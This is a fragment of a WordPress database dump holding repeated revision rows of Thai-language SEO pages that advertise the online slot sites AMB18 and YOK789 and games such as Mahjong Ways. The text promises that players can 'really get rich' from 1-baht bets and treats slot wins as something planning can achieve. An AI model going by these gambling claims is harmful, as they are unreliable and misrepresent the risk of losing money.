ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:15:06','2026-02-26 19:15:06','',44,'https://amb18slot.com/?p=385',0,'revision','',0),(386,3,'2026-02-26 19:15:06','2026-02-26 19:15:06','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:15:06','2026-02-26 19:15:06','',44,'https://amb18slot.com/?p=386',0,'revision','',0),(387,3,'2026-02-26 19:15:07','2026-02-26 19:15:07','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ สล็อต เว็บ ตรง แตก ง่าย ล่าสุด มาพร้อมค่ายยอดนิยม\n</h2> <p>จุดแข็งอีกอย่างของ AMB18 สุดยอดเว็บนำเข้า เว็บดังลิขสิทธิ์แท้ <b>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </b>คือการรวบรวมค่ายเกมยอดนิยมจากต่างประเทศมาไว้ในระบบเดียวผู้เล่นไม่ต้องเสียเวลาเปิดหลายเว็บให้วุ่นวาย เพราะที่นี่รวมทุกค่ายดังมาให้ครบทั้งสายภาพสวย กราฟิกจัดจ้าน และสายโบนัสแตกถี่ ระบบเซิร์ฟเวอร์เสถียรทำให้เข้าเกมได้รวดเร็วไม่ต้องรอนาน อีกทั้งยังมีการอัปเดตเวอร์ชันใหม่ทันทีที่ค่ายเกมปล่อยออกมาจึงมั่นใจได้ว่าผู้เล่นจะได้สัมผัสประสบการณ์ล่าสุดก่อนใคร พร้อมระบบฝากถอนอัตโนมัติที่ช่วยให้บริหารเงินทุนได้สะดวกรองรับการเล่นต่อเนื่องแบบไม่สะดุด</p><h3><b>ค่ายเกม PG SLOT</b></h3><p>หนึ่งในค่ายยอดนิยมที่ขาดไม่ได้คือ PG SLOT ซึ่งขึ้นชื่อเรื่องกราฟิกคมชัดและเอฟเฟกต์อลังการ เกมส่วนใหญ่มีฟีเจอร์ฟรีสปินและตัวคูณรางวัลที่กระตุ้นความตื่นเต้นทุกครั้งที่หมุน วงล้อถูกออกแบบให้เข้าใจง่าย เหมาะกับทั้งมือใหม่และสายเก็บกำไร อีกทั้งยังมีอัตราการจ่ายที่สมดุล ทำให้ผู้เล่นรู้สึกถึงโอกาสในการทำกำไรได้จริงการที่ทางเว็บนำเข้าเกมจากค่ายนี้แบบลิขสิทธิ์แท้จึงช่วยเพิ่มความมั่นใจในคุณภาพและทำให้ทุกการสปินเต็มไปด้วยพลังความมันแบบมืออาชีพ</p><h3><b>ค่ายเกม JOKER GAMING</b></h3><p>JOKER GAMING เป็นอีกค่ายที่สายสล็อตรู้จักกันดีในเรื่องเกมแตกง่ายและมีโบนัสหลากหลาย จุดเด่นอยู่ที่ธีมเกมที่หลากหลายตั้งแต่แนวเอเชียไปจนถึงตะวันตกทำให้ผู้เล่นเลือกสนุกได้ตามสไตล์ตนเอง ระบบเกมถูกพัฒนาให้รองรับการเล่นบนมือถือได้อย่างมีประสิทธิภาพ ภาพไม่กระตุก เสียงชัดเจน การที่ทางเว็บดึงเกมจากค่ายนี้เข้ามาเสริมทัพ จึงทำให้แพลตฟอร์มมีความครบเครื่องมากขึ้น เหมาะสำหรับคนที่ต้องการลุ้นกำไรแบบต่อเนื่องในบรรยากาศที่เร้าใจ</p><h3><b>ค่ายเกม JILI SLOT</b></h3><p>JILI SLOT โดดเด่นในเรื่องการออกแบบเกมที่เน้นความแปลกใหม่และฟีเจอร์พิเศษหลากหลาย หลายเกมมีระบบโบนัสซ้อนโบนัสที่เพิ่มโอกาสรับรางวัลแบบคาดไม่ถึง ภาพกราฟิกทันสมัย โทนสีสดใส ดึงดูดสายตา ทำให้การเล่นไม่น่าเบื่อ นอกจากนี้ยังมีระบบทดลองเล่นให้ผู้เล่นศึกษาแนวทางก่อนลงเงินจริง </p> <img width=\"1200\" height=\"500\" 